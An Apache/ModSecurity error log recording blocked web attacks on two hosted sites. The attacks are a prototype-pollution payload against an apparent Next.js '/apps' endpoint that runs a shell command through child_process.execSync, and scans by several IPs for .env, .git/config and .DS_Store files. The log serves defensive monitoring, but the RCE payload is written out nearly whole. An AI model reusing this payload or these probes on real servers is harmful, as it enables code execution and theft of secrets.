[Sun Dec 14 20:08:22.730774 2025] [:error] [pid 725946] [client 3.106.229.28:37934] [client 3.106.229.28] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aT8LJqnSE5_lC1C3wshwyAAAAAQ"]
[Sun Dec 14 20:08:22.730998 2025] [:error] [pid 725946] [client 3.106.229.28:37934] [client 3.106.229.28] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aT8LJqnSE5_lC1C3wshwyAAAAAQ"]
[Sun Dec 14 20:08:22.777678 2025] [:error] [pid 740198] [client 3.106.229.28:37932] [client 3.106.229.28] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aT8LJkPW3_1eIUPp3FDcbAAAAA4"]
[Sun Dec 14 20:08:22.778158 2025] [:error] [pid 740198] [client 3.106.229.28:37932] [client 3.106.229.28] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aT8LJkPW3_1eIUPp3FDcbAAAAA4"]
[Sun Dec 14 20:08:22.779155 2025] [:error] [pid 740198] [client 3.106.229.28:37932] [client 3.106.229.28] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aT8LJkPW3_1eIUPp3FDcbAAAAA4"]
[Sun Dec 14 20:08:22.779367 2025] [:error] [pid 740198] [client 3.106.229.28:37932] [client 3.106.229.28] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aT8LJkPW3_1eIUPp3FDcbAAAAA4"]
[Tue Dec 16 04:03:15.427919 2025] [authz_core:error] [pid 769693] [client 207.154.212.47:58588] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 16 04:03:18.429320 2025] [:error] [pid 769365] [client 207.154.212.47:58628] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUDL9r6pu6t2QFY7wBUNNwAAAAI"]
[Tue Dec 16 04:03:18.429571 2025] [:error] [pid 769365] [client 207.154.212.47:58628] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUDL9r6pu6t2QFY7wBUNNwAAAAI"]
[Tue Dec 16 04:03:18.430204 2025] [:error] [pid 769365] [client 207.154.212.47:58628] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUDL9r6pu6t2QFY7wBUNNwAAAAI"]
[Tue Dec 16 04:03:19.428440 2025] [:error] [pid 769692] [client 207.154.212.47:58642] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUDL90VxACeM2CHokW_MTQAAAAc"]
[Tue Dec 16 04:03:19.428679 2025] [:error] [pid 769692] [client 207.154.212.47:58642] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUDL90VxACeM2CHokW_MTQAAAAc"]
[Tue Dec 16 04:03:19.428828 2025] [:error] [pid 769692] [client 207.154.212.47:58642] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUDL90VxACeM2CHokW_MTQAAAAc"]
[Tue Dec 16 04:03:21.428586 2025] [:error] [pid 769694] [client 207.154.212.47:58240] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUDL-bpMgFLwbYMxrhXwsgAAAAk"]
[Tue Dec 16 04:03:21.428815 2025] [:error] [pid 769694] [client 207.154.212.47:58240] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUDL-bpMgFLwbYMxrhXwsgAAAAk"]
[Tue Dec 16 04:03:21.428989 2025] [:error] [pid 769694] [client 207.154.212.47:58240] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUDL-bpMgFLwbYMxrhXwsgAAAAk"]
[Tue Dec 16 04:54:16.777926 2025] [authz_core:error] [pid 769634] [client 164.90.228.79:33984] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 16 04:54:19.779911 2025] [:error] [pid 769630] [client 164.90.228.79:34018] [client 164.90.228.79] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUDX6yvnb3zi6ztVI1XL6wAAAAU"]
[Tue Dec 16 04:54:19.780163 2025] [:error] [pid 769630] [client 164.90.228.79:34018] [client 164.90.228.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUDX6yvnb3zi6ztVI1XL6wAAAAU"]
[Tue Dec 16 04:54:19.780323 2025] [:error] [pid 769630] [client 164.90.228.79:34018] [client 164.90.228.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUDX6yvnb3zi6ztVI1XL6wAAAAU"]
[Tue Dec 16 04:54:20.778699 2025] [:error] [pid 769365] [client 164.90.228.79:34028] [client 164.90.228.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUDX7L6pu6t2QFY7wBUNRgAAAAI"]
[Tue Dec 16 04:54:20.778936 2025] [:error] [pid 769365] [client 164.90.228.79:34028] [client 164.90.228.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUDX7L6pu6t2QFY7wBUNRgAAAAI"]
[Tue Dec 16 04:54:20.779090 2025] [:error] [pid 769365] [client 164.90.228.79:34028] [client 164.90.228.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUDX7L6pu6t2QFY7wBUNRgAAAAI"]
[Tue Dec 16 04:54:22.780970 2025] [:error] [pid 769692] [client 164.90.228.79:40514] [client 164.90.228.79] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUDX7kVxACeM2CHokW_MVwAAAAc"]
[Tue Dec 16 04:54:22.781210 2025] [:error] [pid 769692] [client 164.90.228.79:40514] [client 164.90.228.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUDX7kVxACeM2CHokW_MVwAAAAc"]
[Tue Dec 16 04:54:22.781386 2025] [:error] [pid 769692] [client 164.90.228.79:40514] [client 164.90.228.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUDX7kVxACeM2CHokW_MVwAAAAc"]
[Tue Dec 16 04:54:28.518840 2025] [authz_core:error] [pid 769366] [client 139.59.132.8:51746] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 16 04:54:31.520904 2025] [:error] [pid 769365] [client 139.59.132.8:51770] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUDX976pu6t2QFY7wBUNSAAAAAI"]
[Tue Dec 16 04:54:31.521138 2025] [:error] [pid 769365] [client 139.59.132.8:51770] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUDX976pu6t2QFY7wBUNSAAAAAI"]
[Tue Dec 16 04:54:31.521302 2025] [:error] [pid 769365] [client 139.59.132.8:51770] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUDX976pu6t2QFY7wBUNSAAAAAI"]
[Tue Dec 16 04:54:32.521940 2025] [:error] [pid 769692] [client 139.59.132.8:51776] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUDX-EVxACeM2CHokW_MWQAAAAc"]
[Tue Dec 16 04:54:32.522183 2025] [:error] [pid 769692] [client 139.59.132.8:51776] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUDX-EVxACeM2CHokW_MWQAAAAc"]
[Tue Dec 16 04:54:32.522841 2025] [:error] [pid 769692] [client 139.59.132.8:51776] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUDX-EVxACeM2CHokW_MWQAAAAc"]
[Tue Dec 16 04:54:34.523789 2025] [:error] [pid 769364] [client 139.59.132.8:51786] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUDX-kAcFyu65o-KKD6bmwAAAAE"]
[Tue Dec 16 04:54:34.524021 2025] [:error] [pid 769364] [client 139.59.132.8:51786] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUDX-kAcFyu65o-KKD6bmwAAAAE"]
[Tue Dec 16 04:54:34.524189 2025] [:error] [pid 769364] [client 139.59.132.8:51786] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUDX-kAcFyu65o-KKD6bmwAAAAE"]
[Tue Dec 16 06:04:58.891747 2025] [authz_core:error] [pid 769364] [client 128.199.182.55:34190] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 16 06:05:02.310625 2025] [:error] [pid 769693] [client 128.199.182.55:50450] [client 128.199.182.55] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUDofoWY4vtx7NKgDW_HyAAAAAg"]
[Tue Dec 16 06:05:02.310854 2025] [:error] [pid 769693] [client 128.199.182.55:50450] [client 128.199.182.55] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUDofoWY4vtx7NKgDW_HyAAAAAg"]
[Tue Dec 16 06:05:02.311035 2025] [:error] [pid 769693] [client 128.199.182.55:50450] [client 128.199.182.55] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUDofoWY4vtx7NKgDW_HyAAAAAg"]
[Tue Dec 16 06:05:03.440627 2025] [:error] [pid 769365] [client 128.199.182.55:50452] [client 128.199.182.55] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUDof76pu6t2QFY7wBUNYAAAAAI"]
[Tue Dec 16 06:05:03.440857 2025] [:error] [pid 769365] [client 128.199.182.55:50452] [client 128.199.182.55] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUDof76pu6t2QFY7wBUNYAAAAAI"]
